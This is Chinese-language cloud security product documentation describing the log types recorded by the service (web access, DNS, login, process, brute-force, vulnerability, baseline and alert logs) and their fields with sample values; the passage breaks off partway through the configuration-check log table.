日志类别及字段说明V2.0

查看云安全中心日志可以帮您及时发现、调查和响应安全事件。购买日志分析存储容量后,云安全中心会默认开启安全日志、网络日志、主机日志,分别记录系统中的安全事件、网络流量情况和主机的活动。本文介绍云安全中心日志字典V2.0支持的日志类型以及每种日志类型的字段说明。

不同版本支持记录的日志类型

云安全中心不同版本支持的安全能力不同,可记录的日志类型不同。全量购买场景下,根据您购买的云安全中心版本记录支持的日志类型。非全量购买场景下(支持授权数管理),按照服务器绑定的版本记录服务器中对应的日志类型。不同版本支持记录的日志类型如下:

版本

支持记录的日志类型

企业版、旗舰版

云安全中心支持的所有日志类型。

防病毒版、高级版

所有主机日志和安全日志。

未绑定授权服务器

  • 网络日志

    说明

    仅支持记录购买企业版或旗舰版用户未绑定授权服务器的网络日志。不支持记录购买防病毒版或高级版用户未绑定授权服务器的网络日志。

    • Web访问日志

    • DNS解析日志

    • 网络会话日志

    • 本地DNS日志

  • 主机日志

    • 客户端事件日志

  • 安全日志

    • 漏洞日志(仅记录免费版支持的漏洞)

    • 安全告警日志(仅记录免费版支持的告警)

    • 云平台配置检查日志(仅使用云平台配置检查功能后记录日志)

    • 应用防护日志(仅使用应用防护功能后记录日志)

    • 恶意文件检测日志(仅使用恶意文件检测功能后记录日志)

    • 核心文件监控事件日志(仅使用核心文件监控功能后记录上报的告警事件)

日志分类

网络日志

说明

全球(不含中国)区域不支持查看网络日志。

日志类型

__topic__

描述

采集周期

Web访问日志

sas-log-http

记录用户请求Web服务器和Web服务器响应的日志,包括HTTP请求的详细信息,例如用户IP地址、请求时间、请求方法、请求URL、HTTP状态码、响应大小等。

Web访问日志通常用于分析Web流量和用户行为、识别访问模式和异常情况、优化网站性能等。

数据延迟采集,延迟时间一般为:1~12小时

DNS解析日志

sas-log-dns

记录DNS解析过程详细信息的日志,包括请求域名、查询类型、客户端IP地址、响应值等信息。

通过分析DNS解析日志,您可以了解DNS解析的请求和响应过程,检测异常的解析行为、DNS劫持、DNS污染等问题。

网络会话日志

sas-log-session

记录网络连接和数据传输的日志,包括网络会话的详细信息,例如会话开始时间、双方IP地址、使用的协议和端口等。

网络会话日志通常用于监控网络流量、识别潜在威胁、优化网络性能等。

本地DNS日志

local-dns

记录在本地DNS服务器上的DNS查询和响应的日志,包括本地DNS请求和响应的详细信息,例如请求域名、查询类型、客户端IP地址、响应值等。

通过本地DNS日志,您可以了解网络中的DNS查询活动,检测异常的查询行为、域名劫持和DNS污染等问题

主机日志

日志类型

__topic__

描述

采集周期

登录流水日志

aegis-log-login

记录用户登录服务器的日志,包括登录时间、登录用户、登录方式、登录IP地址等信息。

登录流水日志可以帮助您监控用户的活动,及时识别和响应异常行为,从而保障系统的安全性。

说明

云安全中心不支持Windows Server 2008操作系统的登录流水日志。

实时采集。

网络连接日志

aegis-log-network

记录网络连接活动的日志,包括服务器连接五元组、连接时间、连接状态等信息。

网络连接日志可以帮助您发现异常连接行为,识别潜在的网络攻击,优化网络性能等。

说明
  • 服务器只收集网络连接从建立到结束过程中的部分状态。

  • 入向流量不记录。

实时采集。

进程启动日志

aegis-log-process

记录服务器上进程启动相关的日志,包括进程启动时间、启动命令、参数等信息。

通过记录和分析进程启动日志,您可以了解系统中进程的启动情况和配置信息,检测异常进程活动、恶意软件入侵和安全威胁等问题。

实时采集,进程启动立刻上报。

暴力破解日志

aegis-log-crack

记录暴力破解行为的日志,包括尝试登录及破解系统、应用程序或账号的信息。

通过记录和分析暴力破解日志,您可以了解系统或应用程序受到的暴力破解攻击,检测异常的登录尝试、弱密码和凭证泄露等问题。暴力破解日志还可以用于追踪恶意用户和取证分析,协助安全团队进行事件响应和调查工作。

实时采集。

账号快照日志

aegis-snapshot-host

记录系统或应用程序中用户账号详细信息的日志,包括账号的基本属性,例如用户名、密码策略、登录历史等。

通过比较不同时间点的账号快照日志,您可以了解用户账号的变化和演变情况,及时检测潜在的账号安全问题,例如未授权的账号访问、异常的账号状态等。

  • 开启资产指纹自动采集功能时,按照设定的周期自动采集。资产指纹自动采集的更多信息,请参见资产指纹调查

  • 未开启资产指纹自动采集功能时,每台服务器一天非固定时间收集一次。

网络快照日志

aegis-snapshot-port

记录网络连接的日志,包括连接五元组、连接状态及关联的进程信息等字段。

通过记录和分析网络连接快照日志,您可以了解系统中活动的网络套接字情况,帮助您发现异常连接行为,识别潜在的网络攻击,优化网络性能等。

进程快照日志

aegis-snapshot-process

记录系统中进程活动的日志,包括进程ID、进程名称、进程启动时间等信息。

通过记录和分析进程快照日志,您可以了解系统中进程的活动情况、资源占用情况,检测异常进程、CPU占用和内存泄露等问题。

DNS请求日志

aegis-log-dns-query

记录DNS查询请求的日志,包括服务器发送DNS查询请求的详细信息,例如查询的域名、查询类型、查询来源等信息。

通过分析DNS请求日志,您可以了解网络中的DNS查询活动,检测异常的查询行为、域名劫持和DNS污染等问题。

说明

针对内核版本低于4.X.X系列的Linux服务器,云安全中心不支持DNS请求日志的采集及恶意DNS行为的检测。建议您考虑升级系统内核至更高版本,以此来获得全面的威胁检测功能。

实时采集。

客户端事件日志

aegis-log-client

记录云安全中心客户端的上线和离线事件。

实时采集。

安全日志类型

日志类型

__topic__

描述

采集周期

漏洞日志

sas-vul-log

记录系统或应用程序中发现的漏洞相关信息的日志,包括漏洞名称、漏洞状态、处理动作等信息。

通过记录和分析漏洞日志,您可以了解系统中存在的漏洞情况、安全风险和攻击趋势,及时采取相应的补救措施。

实时采集。

基线日志

sas-hc-log

记录基线风险检查结果的日志,包括基线等级、基线类别、风险等级等信息。

通过记录和分析基线风险日志,您可以了解系统的基线安全状态和潜在的风险。

说明

仅记录首次出现且未通过的检查项数据,以及历史检测中已通过但重新检测后未通过的检查项数据。

安全告警日志

sas-security-log

记录系统或应用程序中发生的安全事件和告警信息的日志,包括告警数据源、告警详情、告警等级等信息。

通过记录和分析安全告警日志,您可以了解系统中的安全事件和威胁情况,及时采取相应的响应措施。

云平台配置检查日志

sas-cspm-log

记录云平台配置检查相关的日志,包括云平台配置检查的检查结果、加白操作等信息。

通过记录和分析云平台配置检查日志,您可以了解云平台中存在的配置问题和潜在的安全风险。

网络防御日志

sas-net-block

记录网络攻击事件的日志,包括攻击类型、源IP地址、目标IP地址等关键信息。

通过记录和分析网络防御日志,您可以了解网络中发生的安全事件,进而采取相应的响应和防御措施,提高网络的安全性和可靠性。

应用防护日志

sas-rasp-log

记录应用防护功能的攻击告警信息的日志,包括攻击类型、行为数据、攻击者IP等关键信息。

通过记录和分析应用防护告警日志,您可以了解应用程序中发生的安全事件,进而采取相应的响应和防御措施,提高应用程序的安全性和可靠性。

恶意文件检测日志

sas-filedetect-log

记录使用恶意文件检测SDK功能进行恶意文件检测的日志,包括恶意文件检测的文件信息、检测场景、检测结果等信息。

通过记录和分析恶意文件检测日志,您可以识别离线文件和阿里云OSS文件中存在的常见病毒,例如勒索病毒、挖矿程序等,及时处理以防止恶意文件传播和执行。

网络日志字段说明

重要

仅云安全中心企业版、旗舰版支持网络日志。

Web访问日志

字段名

说明

示例

response_content_length

返回的消息实体的长度。单位为:Byte。

612

dst_ip

目标主机的IP地址。

39.105.XX.XX

dst_port

目标主机的端口。

80

host

访问的对向主机的IP地址或域名。

39.105.XX.XX

jump_location

重定向地址。

123

request_method

HTTP请求方式。

GET

http_referer

客户端向服务器发送请求时的HTTP referer,告知服务器访问来源的HTTP连接。

www.example.com

request_datetime

请求时间。

2024-08-01 06:59:28

status

服务器对请求的响应状态码。

200

content_type

请求内容类型。

text/plain;charset=utf-8

response_content_type

响应内容类型。

text/plain; charset=utf-8

src_ip

访问源的IP地址。

31.220.XX.XX

src_port

访问源的端口。

59524

request_uri

请求URI。

/report

http_user_agent

向客户端发起的请求。

okhttp/3.2.0

http_x_forward_for

HTTP请求头字段,记录客户端的真实IP地址。

31.220.XX.XX

DNS解析日志

字段名

说明

示例

additional

DNS服务器返回的附加资源记录的信息,例如CNAME记录、MX记录、PTR记录等。

additional_num

DNS服务器返回的附加资源记录的数量。

0

answer

DNS服务器返回的回答信息,指示查询主机的具体解析结果。回答信息包含了请求域名对应的IP地址或其他相关信息,例如A记录、AAAA记录等。

example.com A IN 52 1.2.XX.XX

answer_num

DNS服务器返回的回答信息的数量。

1

authority

DNS服务器返回的权威记录信息,指示负责管理和提供该域名解析的DNS服务器。权威记录包含了对请求域名进行授权的DNS服务器的信息,例如NS记录。

NS IN 17597

authority_num

DNS服务器返回的权威记录的数量。

1

client_subnet

DNS客户端的子网掩码信息。

59.152.XX.XX

dst_ip

目的IP。

106.55.XX.XX

dst_port

目的端口。

53

net_connect_dir

DNS请求的数据传输方向,取值:

  • in:进入DNS服务器的请求。

  • out:DNS服务器发出的响应。

out

qid

查询ID。

13551

query_name

DNS解析请求的查询域名。

example.com

query_type

DNS解析请求的查询类型。

A

query_datetime

DNS解析请求的时间。

2024-08-01 08:33:58

rcode

DNS服务器返回的响应代码,指示DNS解析结果。

0

region

来源地域ID。取值:

  • 1:北京。

  • 2:青岛。

  • 3:杭州。

  • 4:上海。

  • 5:深圳。

  • 6:其他。

1

response_datetime

DNS服务器返回响应的时间。

2024-08-01 08:31:25

src_ip

源IP地址。

106.11.XX.XX

src_port

源端口。

22

网络会话日志

字段名

说明

示例

asset_type

产生日志的资产。取值:

  • ECS:云服务器ECS。

  • SLB:负载均衡SLB。

  • NAT:NAT网关。

ECS

dst_ip

目标IP地址。

119.96.XX.XX

dst_port

目标端口。

443

net_connect_dir

网络会话的数据传输方向。固定取值为out。

  • 通信协议为TCP时,表示从阿里云内到阿里云外发起的请求。

  • 通信协议为UDP时,不代表请求的实际方向,仅供参考。

out

l4_proto

协议类型。取值:

  • tcp

  • udp

tcp

session_time

网络会话的开始时间。

2024-08-01 08:31:18

src_ip

源IP地址。

121.40.XX.XX

src_port

源端口。

53602

本地DNS日志

字段名

说明

示例

anwser_name

DNS回答的记录名称,表示与资源记录关联的域名。

example.com

answer_rdata

DNS回答的RDA(Resource Data Area)字段,表示解析结果的具体值。

106.11.XX.XX

answer_ttl

DNS回答的TTL(Time to Live)字段,表示解析结果的生存时间,单位为秒。

600

answer_type

DNS响应的记录类型,以下是常见的DNS响应类型取值:

  • 1:A记录。

  • 2:NS记录。

  • 5:CNAME记录。

  • 6:SOA记录。

  • 10:NULL记录。

  • 12:PTR记录。

  • 15:MX记录。

  • 16:TXT记录。

  • 25:KEY记录。

  • 28:AAAA记录。

  • 33:SRV记录。

  • 41:OPT记录。

  • 43:DS记录。

  • 44:SSHFP记录。

  • 45:IPSECKEY记录。

  • 46:RRSIG记录。

  • 47:NSEC记录。

1

dst_ip

目的IP地址,表示请求发往的IP地址,默认为十进制IP地址格式。

323223****

dst_port

目的端口,表示请求发往的端口号。

53

group_id

分组ID。相同的分组ID表示相同的DNS请求或响应。

3

host

主机名。

hostname

id

查询ID,用于唯一标识DNS请求或响应。

64588

instance_id

实例ID。

i-2zeg4zldn8zypsfg****

internet_ip

DNS请求或响应的公网IP地址。

121.40.XX.XX

ip_ttl

DNS请求或响应中IP数据包的TTL值。

64

query_name

查询的域名。

example.com

query_type

DNS解析请求的查询类型。取值:

  • 1:A记录。

  • 2:NS记录。

  • 5:CNAME记录。

  • 6:SOA记录。

  • 10:NULL记录。

  • 12:PTR记录。

  • 15:MX记录。

  • 16:TXT记录。

  • 25:KEY记录。

  • 28:AAAA记录。

  • 33:SRV记录。

1

src_ip

发起DNS请求或响应的IP地址,默认为十进制IP地址格式。

168427****

src_port

发起DNS请求或响应的端口号。

53

start_time

开始时间戳,单位秒, 也用于表示事件发生的时间。

1719472214

time_usecond

DNS请求或响应的时间戳,单位为微秒。

590662

tunnel_id

DNS请求或响应所使用的隧道ID,用于唯一标识一个网络隧道。网络隧道是一种通过不同的网络协议来传输数据的方式,可以用于安全访问互联网或跨越不同网络的通信。

514763

主机日志字段说明

登录流水日志

字段名

说明

示例

instance_id

实例ID。

i-2zeg4zldn8zypsfg****

host_ip

服务器的IP地址。

192.168.XX.XX

sas_group_name

服务器在云安全中心的资产分组。

default

uuid

服务器的UUID。

5d83b26b-b7ca-4a0a-9267-12****

src_ip

登录服务器的IP地址。

221.11.XX.XX

dst_port

登录服务器的端口。

22

login_type

登录类型。取值包括但不限于:

  • SSHLOGINSSH:SSH登录。

  • RDPLOGIN:远程桌面登录。

  • IPCLOGIN:IPC连接登录。

SSH

username

登录用户名。

admin

login_count

登录次数。

1分钟内重复登录会被合并为1条日志,例如login_count值为3,表示在最近1分钟内重复登录了3次。

3

start_time

开始时间戳,单位秒, 也用于表示事件发生的时间。

1719472214

网络连接日志

字段名

说明

示例

cmd_chain

进程链。

[

{

"9883":"bash -c kill -0 -- -'6274'"

}

......

]

cmd_chain_index

进程链索引,可以通过相同索引查找进程链。

B184

container_hostname

容器内服务器名称。

nginx-ingress-controller-765f67fd4d-****

container_id

容器ID。

4181de1e2b20c3397f1c409266dbd5631d1bc5be7af85246b0d****

container_image_id

镜像ID。

registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-controller@sha256:5f281994d9e71a1b1a087365271024991c5b0d0543c48f0****

container_image_name

镜像名称。

registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-****

container_name

容器名称。

nginx-ingress-****

container_pid

容器内进程ID。

0

net_connect_dir

网络连接方向。取值:

  • in:入方向。

  • out:出方向。

in

dst_ip

网络连接接收者的IP。

  • dirout时,表示对端主机。

  • dirin时,表示本机。

192.168.XX.XX

dst_port

网络连接接收者的端口。

443

instance_id

实例ID。

i-2zeg4zldn8zypsfg****

host_ip

服务器IP地址。

192.168.XX.XX

parent_proc_name

父进程的文件名。

/usr/bin/bash

pid

进程ID。

14275

ppid

父进程ID。

14268

proc_name

进程名。

nginx

proc_path

进程路径。

/usr/local/nginx/sbin/nginx

proc_start_time

进程的启动时间。

N/A

connection_type

协议。取值:

  • tcp

  • udp

  • raw(表示raw socket)。

tcp

sas_group_name

服务器在云安全中心的资产分组。

default

src_ip

源IP地址。

100.127.XX.XX

src_port

源端口。

41897

srv_comm

父进程的父进程关联的命令名。

containerd-shim

status

网络连接状态。取值:

  • 1:连接已关闭(closed)。

  • 2:正在等待连接请求(listen)。

  • 3:已发送SYN请求(syn send)。

  • 4:已接收SYN请求(syn recv)。

  • 5:连接已建立(established)。

  • 6:等待关闭连接(close wait)。

  • 7:正在关闭连接(closing)。

  • 8:等待对方发送关闭请求(fin_wait1)。

  • 9:等待对方发送关闭请求并确认(fin_wait2)。

  • 10:等待足够的时间以确保对方收到关闭请求的确认(time_wait)。

  • 11:已删除传输控制块(delete_tcb)。

5

type

实时网络连接的类型。取值:

  • connect:主动发起TCP connect连接。

  • accept:收到TCP连接。

  • listen:端口监听。

listen

uid

进程用户的ID。

101

username

进程的用户名。

root

uuid

服务器的UUID。

5d83b26b-b7ca-4a0a-9267-12****

start_time

开始时间戳,单位秒, 也用于表示事件发生的时间。

1719472214

进程启动日志

字段名

说明

示例

cmd_chain

进程链。

[

{

"9883":"bash -c kill -0 -- -'6274'"

}

......

]

cmd_chain_index

进程链索引,可以通过相同索引查找进程链。

B184

cmd_index

命令行每个参数的索引,每两个为一组,标识一个参数的起止索引。

0,3,5,8

cmdline

进程启动的完整命令行。

ipset list KUBE-6-CLUSTER-IP

comm

进程关联的命令名。

N/A

container_hostname

容器内服务器名称。

nginx-ingress-controller-765f67fd4d-****

container_id

容器ID。

4181de1e2b20c3397f1c409266dbd5631d1bc5be7af85246b0d****

container_image_id

镜像ID。

registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-controller@sha256:5f281994d9e71a1b1a087365271024991c5b0d0543c48f0****

container_image_name

镜像名称。

registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-****

container_name

容器名称。

nginx-ingress-****

container_pid

容器内进程ID。

0

cwd

进程运行目录。

N/A

proc_name

进程文件名。

ipset

proc_path

进程文件完整路径。

/usr/sbin/ipset

gid

进程组的ID。

0

groupname

用户组。

group1

instance_id

实例ID。

i-2zeg4zldn8zypsfg****

host_ip

服务器IP地址。

192.168.XX.XX

parent_cmd_line

父进程的命令行。

/usr/local/bin/kube-proxy --config=/var/lib/kube-proxy/config.conf --hostname-override=cn-beijing.192.168.XX.XX

parent_proc_name

父进程文件名。

kube-proxy

parent_proc_path

父进程文件完整路径。

/usr/local/bin/kube-proxy

pid

进程ID。

14275

ppid

父进程ID。

14268

proc_start_time

进程启动时间。

2024-08-01 16:45:40

parent_proc_start_time

父进程的启动时间。

2024-07-12 19:45:19

sas_group_name

服务器在云安全中心的资产分组。

default

srv_cmd

祖进程的命令行。

/usr/bin/containerd

tty

登录的终端。N/A表示账号从未登录过终端。

N/A

uid

用户ID。

123

username

进程的用户名。

root

uuid

服务器的UUID。

5d83b26b-b7ca-4a0a-9267-12****

start_time

开始时间戳,单位秒, 也用于表示事件发生的时间。

1719472214

暴力破解日志

字段名

说明

示例

instance_id

实例ID。

i-2zeg4zldn8zypsfg****

host_ip

被暴力破解的服务器IP地址。

192.168.XX.XX

sas_group_name

服务器在云安全中心的资产分组。

default

uuid

被暴力破解的服务器UUID。

5d83b26b-b7ca-4a0a-9267-12*****

login_count

失败登录次数。

1分钟内重复登录会被合并为1条日志,例如warn_count值为3,表示在最近1分钟内重复登录了3次。

3

src_ip

登录来源IP地址。

47.92.XX.XX

dst_port

登录端口。

22

login_type

登录类型。取值:

  • SSHLOGINSSH:SSH登录。

  • RDPLOGIN:远程桌面登录。

  • IPCLOGIN:IPC连接登录。

SSH

username

登录用户名。

user

start_time

开始时间戳,单位秒, 也用于表示事件发生的时间。

1719472214

账号快照日志

字段名

说明

示例

account_expire

账号的过期时间。never表示永不过期。

never

domain

账号所在的域或目录服务。N/A表示不属于任何域。

N/A

groups

账号所在的分组。N/A表示不属于任何组。

["nscd"]

home_dir

主目录,系统中存储和管理文件的默认位置。

/Users/abc

instance_id

实例ID。

i-2zeg4zldn8zypsfg****

host_ip

服务器IP地址。

192.168.XX.XX

last_chg

最后一次修改密码的日期。

2022-11-29

last_logon

最后一次登录账号的日期和时间。N/A表示从未登录过。

2023-08-18 09:21:21

login_ip

最后一次登录账号的远程IP地址。N/A表示从未登录过。

192.168.XX.XX

passwd_expire

密码的过期日期。never表示永不过期。

2024-08-24

perm

是否拥有root权限。取值:

  • 0:没有root权限。

  • 1:有root权限。

0

sas_group_name

服务器在云安全中心的资产分组。

default

shell

Linux的Shell命令。

/sbin/nologin

status

用户账号的状态,取值:

  • 0:账号已被禁止登录。

  • 1:账号可以正常登录。

0

tty

登录的终端。N/A表示账号从未登录过终端。

N/A

username

用户名称。

nscd

uuid

服务器的UUID。

5d83b26b-b7ca-4a0a-9267-12****

warn_time

密码到期提醒日期。never表示永不提醒。

2024-08-20

start_time

开始时间戳,单位秒, 也用于表示事件发生的时间。

1719472214

网络快照日志

字段名

说明

示例

net_connect_dir

网络连接方向。取值:

  • in:入方向。

  • out:出方向。

in

dst_ip

网络连接接收者的IP。

  • dirout时,表示对端主机。

  • dirin时,表示本机。

192.168.XX.XX

dst_port

网络连接接收者的端口。

443

instance_id

实例ID。

i-2zeg4zldn8zypsfg****

host_ip

服务器IP地址。

192.168.XX.XX

pid

进程ID。

682

proc_name

进程名。

sshd

connection_type

协议。取值:

  • tcp4:用IPv4协议的TCP连接。

  • tcp6:用IPv6协议的TCP连接。

  • udp4:用IPv4协议的UDP连接。

  • udp6:用IPv6协议的UDP连接。

tcp4

sas_group_name

服务器在云安全中心的资产分组。

default

src_ip

源IP地址。

100.127.XX.XX

src_port

源端口。

41897

status

网络连接状态。取值:

  • 1:连接已关闭(closed)。

  • 2:正在等待连接请求(listen)。

  • 3:已发送SYN请求(syn send)。

  • 4:已接收SYN请求(syn recv)。

  • 5:连接已建立(established)。

  • 6:等待关闭连接(close wait)。

  • 7:正在关闭连接(closing)。

  • 8:等待对方发送关闭请求(fin_wait1)。

  • 9:等待对方发送关闭请求并确认(fin_wait2)。

  • 10:等待足够的时间以确保对方收到关闭请求的确认(time_wait)。

  • 11:已删除传输控制块(delete_tcb)。

5

uuid

服务器的UUID。

5d83b26b-b7ca-4a0a-9267-12****

start_time

开始时间戳,单位秒, 也用于表示事件发生的时间。

1719472214

进程快照日志

字段名

说明

示例

cmdline

进程启动的完整命令行。

/usr/local/share/assist-daemon/assist_daemon

instance_id

实例ID。

i-2zeg4zldn8zypsfg****

host_ip

服务器IP地址。

192.168.XX.XX

md5

二进制文件的MD5哈希值。

说明

超过1 MB的进程文件不进行MD5计算。

1086e731640751c9802c19a7f53a64f5

proc_name

进程文件名。

assist_daemon

proc_path

进程文件完整路径。

/usr/local/share/assist-daemon/assist_daemon

pid

进程ID。

1692

pname

父进程文件名。

systemd

sas_group_name

服务器在云安全中心的资产分组。

default

proc_start_time

进程启动时间。内置字段。

2023-08-18 20:00:12

uid

进程用户的ID。

101

username

进程的用户名。

root

uuid

服务器的UUID。

5d83b26b-b7ca-4a0a-9267-12****

start_time

开始时间戳,单位秒, 也用于表示事件发生的时间。

1719472214

DNS请求日志

字段名

说明

示例

domain

DNS请求对应的域名。

example.aliyundoc.com

instance_id

实例ID。

i-2zeg4zldn8zypsfg****

host_ip

发起DNS请求的服务器IP地址。

192.168.XX.XX

pid

发起DNS请求的进程ID。

3544

ppid

发起DNS请求的父进程ID。

3408

cmd_chain

发起DNS请求的进程链。

"3544":"\"C:\\Program Files (x86)\\Alibaba\\Aegis\\AliDetect\\AliDetect.exe\""

cmdline

发起DNS请求的命令行。

C:\Program Files (x86)\Alibaba\Aegis\AliDetect\AliDetect.exe

proc_path

发起DNS请求的进程路径。

C:/Program Files (x86)/Alibaba/Aegis/AliDetect/AliDetect.exe

sas_group_name

服务器在云安全中心的资产分组。

default

time

捕获DNS请求事件的时间,该时间一般和DNS请求发生时间相同。

2023-08-17 20:05:04

uuid

发起DNS请求的服务器UUID。

5d83b26b-b7ca-4a0a-9267-12****

start_time

开始时间戳,单位秒, 也用于表示事件发生的时间。

1719472214

客户端事件日志

字段名

说明

示例

uuid

服务器的UUID。

5d83b26b-b7ca-4a0a-9267-12****

host_ip

服务器IP地址。

192.168.XX.XX

agent_version

客户端版本。

aegis_11_91

last_login

上次登录的时间戳。单位:毫秒。

1716444387617

platform

操作系统类型。取值:

  • windows

  • linux

linux

region_id

服务器所在地域ID。

cn-beijing

status

客户端状态。取值:

  • online

  • offline

online

start_time

开始时间戳,单位秒, 也用于表示事件发生的时间。

1719472214

安全日志字段说明

漏洞日志

字段名

说明

示例

vul_alias_name

漏洞别名。

CESA-2023:1335: openssl Security Update

risk_level

风险等级。取值:

  • asap:高

  • later:中

  • nntf:低

later

extend_content

漏洞扩展信息。

{"cveList":["CVE-2023-0286"],"necessity":{"gmt_create":"20230816","connect_cnt":80,"total_score":0.0,"assets_factor":1.0,"enviroment_factor":1.5,"status":"normal"},"os":"centos","osRelease":"7","preCheck":{},"rpmCanUpdate":true,"rpmEntityList":[{"fullVersion":"1.0.2k-25.el7_9","kernel":false,"matchDetail":"openssl-libs version less than 1.0.2k-26.el7_9","matchList":["openssl-libs version less than 1.0.2k-26.el7_9"],"name":"openssl-libs","nextResult":false,"path":"/etc/pki/tls","result":true,"updateCmd":"yum update openssl-libs","version":"1.0.2k-25.el7_9"},{"fullVersion":"1.0.2k-25.el7_9","kernel":false,"matchDetail":"openssl version less than 1.0.2k-26.el7_9","matchList":["openssl version less than 1.0.2k-26.el7_9"],"name":"openssl","nextResult":false,"path":"/etc/pki/CA","result":true,"updateCmd":"yum update openssl","version":"1.0.2k-25.el7_9"}]}

instance_id

实例ID。

i-2zeg4zldn8zypsfg****

internet_ip

资产的公网IP。

39.104.XX.XX

intranet_ip

资产的私网IP。

192.168.XX.XX

instance_name

主机名称。

hhht-linux-***

vul_name

漏洞名称。

centos:7:cesa-2023:1335

operation

漏洞的处理动作。取值:

  • new:新增。

  • verify:验证。

  • fix:修复。

new

status

状态信息。取值:

  • 1:未修复。

  • 2:修复失败。

  • 3:回滚失败。

  • 4:修复中。

  • 5:回滚中。

  • 6:验证中。

  • 7:修复成功。

  • 8:修复成功,待重启。

  • 9:回滚成功。

  • 10:忽略。

  • 11:回滚成功,待重启。

  • 12:已不存在。

  • 13:已失效。

1

tag

漏洞的标签。取值:

  • oval:Linux软件漏洞。

  • system:Windows系统漏洞。

  • cms:Web-CMS漏洞。

    说明

    其他类型的漏洞的标签为随机字符串。

oval

type

漏洞类型。取值:

  • sys:Windows系统漏洞。

  • cve:Linux软件漏洞。

  • cms:Web-CMS漏洞。

  • emg:紧急漏洞。

sys

uuid

服务器UUID。

ad66133a-dc82-4e5e-9659-a49e3****

start_time

开始时间戳,单位秒, 也用于表示事件发生的时间。

1719472214

基线日志

字段名

说明

示例

check_item_name

检查项名称。

设置密码修改最小间隔时间

check_item_level

基线的检查等级。取值:

  • high:高危。

  • medium:中危。

  • low:低危。

medium

check_type

检查项类型。

身份鉴别

instance_id

实例ID。

i-2zeg4zldn8zypsfg****

risk_level

风险项级别。取值:

  • high:高。

  • medium:中。

  • low:低。

medium

operation

操作信息。取值:

  • new:新增。

  • verity:验证。

new

risk_name

风险项名称。

密码策略合规检测

sas_group_name

检测出当前风险项的服务器在云安全中心的资产分组。

default

status

状态信息。取值:

  • 1:未修复。

  • 2:修复失败。

  • 3:回滚失败。

  • 4:修复中。

  • 5:回滚中。

  • 6:验证中。

  • 7:修复成功。

  • 8:修复成功,待重启。

  • 9:回滚成功。

  • 10:忽略。

  • 11:回滚成功,待重启。

  • 12:已不存在。

  • 13:已失效。

1

sub_type_alias_name

子类型别名(中文)。

国际通用安全最佳实践-Ubuntu 16/18/20/22安全基线检查

sub_type_name

基线子类型名称。基线子类型取值请参见基线类型及子类型列表

hc_ubuntu16_cis_rules

type_alias_name

类型别名(中文)。

国际通用安全最佳实践

type_name

基线类型。基线类型取值请参见基线类型及子类型列表

cis

uuid

检测出当前风险项的服务器UUID。

1ad66133a-dc82-4e5e-9659-a49e3****

start_time

开始时间戳,单位秒, 也用于表示事件发生的时间。

1719472214

安全告警日志

字段名

说明

示例

data_source

数据源。取值:

  • aegis_suspicious_event:主机异常。

  • aegis_suspicious_file_v2:Webshell。

  • aegis_login_log:异常登录。

  • honeypot:云蜜罐告警事件。

  • object_scan:文件检测异常事件。

  • security_event:云安全中心异常事件。

  • sas_ak_leak:AK泄露事件。

aegis_login_log

detail

告警详情。

说明

告警类型不同,detail字段包含的内容也不同。如果您在查看告警日志时,对detail字段中的参数有疑问,您可以通过智能在线联系技术支持人员

{"loginSourceIp":"221.11.XX.XX","loginDestinationPort":22,"loginUser":"root","protocol":2,"protocolName":"SSH","clientIp":"192.168.XX.XX","loginTimes":1,"location":"西安市","type":"login_common_account","displayEventName":"ECS非常用账号登录","status":0}

instance_id

实例ID。

i-2zeg4zldn8zypsfg****

internet_ip

资产的公网IP。

39.104.XX.XX

intranet_ip

资产的私网IP。

192.168.XX.XX

level

告警事件的危险等级。取值:

  • serious:紧急。

  • suspicious:可疑。

  • remind:提醒。

suspicious

name

告警名称。

异常登录-ECS非常用账号登录

operation

操作信息。取值:

  • new:新增。

  • dealing:处理。

  • update:更新。

new

status

告警的状态。取值:

  • 0:全部。

  • 1:待处理。

  • 2:已忽略。

  • 4:已确认。

  • 8:已标记为误报。

  • 16:处理中。

  • 32:处理完毕。

  • 64:已经过期。

  • 128:已经删除。

  • 512:自动拦截中。

  • 513:自动拦截完毕。

1

unique_info

告警的唯一标识。

2536dd765f804916a1fa3b9516b5****

uuid

产生告警的服务器UUID。

ad66133a-dc82-4e5e-9659-a49e3****

start_time

开始时间戳,单位秒, 也用于表示事件发生的时间。

1719472214

云平台配置检查日志

字段名

说明

示例

check_id

检查项ID。您可以调用ListCheckResult - 查看云产品中云平台配置检查风险项结果详情接口获取ID值。

11

check_item_name

检查项名称。

回源配置

instance_id

实例ID。

i-2zeg4zldn8zypsfg****

instance_name

实例名称。

lsm

instance_result

风险产生的影响。格式为JSON字符串。

{"Checks":[{}],"Columns":[{"key":"RegionIdShow","search":true,"searchKey":"RegionIdKey","showName":"Region","type":"text"},{"key":"InstanceIdShow","search":true,"searchKey":"InstanceIdKey","showName":"Instance ID","type":"link"},{"key":"InstanceNameShow","search":true,"searchKey":"InstanceNameKey","showName":"Instance Name","type":"text"}]}

instance_sub_type

实例的子类型。取值:

  • 当实例类型为ECS时,子类型的取值:

    • INSTANCE

    • DISK

    • SECURITY_GROUP

  • 当实例类型为ACR时,子类型的取值:

    • REPOSITORY_ENTERPRISE

    • REPOSITORY_PERSON

  • 当实例类型为RAM时,子类型的取值:

    • ALIAS

    • USER

    • POLICY

    • GROUP

  • 当实例类型为WAF时,子类型的取值为DOMAIN

  • 当实例类型为其他值时,子类型的取值为INSTANCE

INSTANCE

instance_type

实例类型。取值:

  • ECS:云服务器。

  • SLB:负载均衡。

  • RDS:RDS数据库。

  • MONGODB:MongoDB数据库。

  • KVSTORE:Redis数据库。

  • ACR:容器镜像服务。

  • CSK:CSK。

  • VPC:专有网络。

  • ACTIONTRAIL:操作审计。

  • CDN:内容分发网络。

  • CAS:数字证书管理服务(原SSL证书)。

  • RDC:云效。

  • RAM:访问控制。

  • DDOS:DDoS防护。

  • WAF:Web应用防火墙。

  • OSS:对象存储。

  • POLARDB:PolarDB数据库。

  • POSTGRESQL:PostgreSQL数据库。

  • MSE:微服务引擎。

  • NAS:文件存储。

  • SDDP:敏感数据保护。

  • EIP:弹性公网IP。

ECS

region_id

实例所在地域ID。

cn-hangzhou

requirement_id

条例ID。您可以通过ListCheckStandard - 云平台配置检查获取标准列表接口获取该ID。

5

risk_level

风险级别。取值:

  • LOW

  • MEDIUM

  • HIGH

MEDIUM

section_id

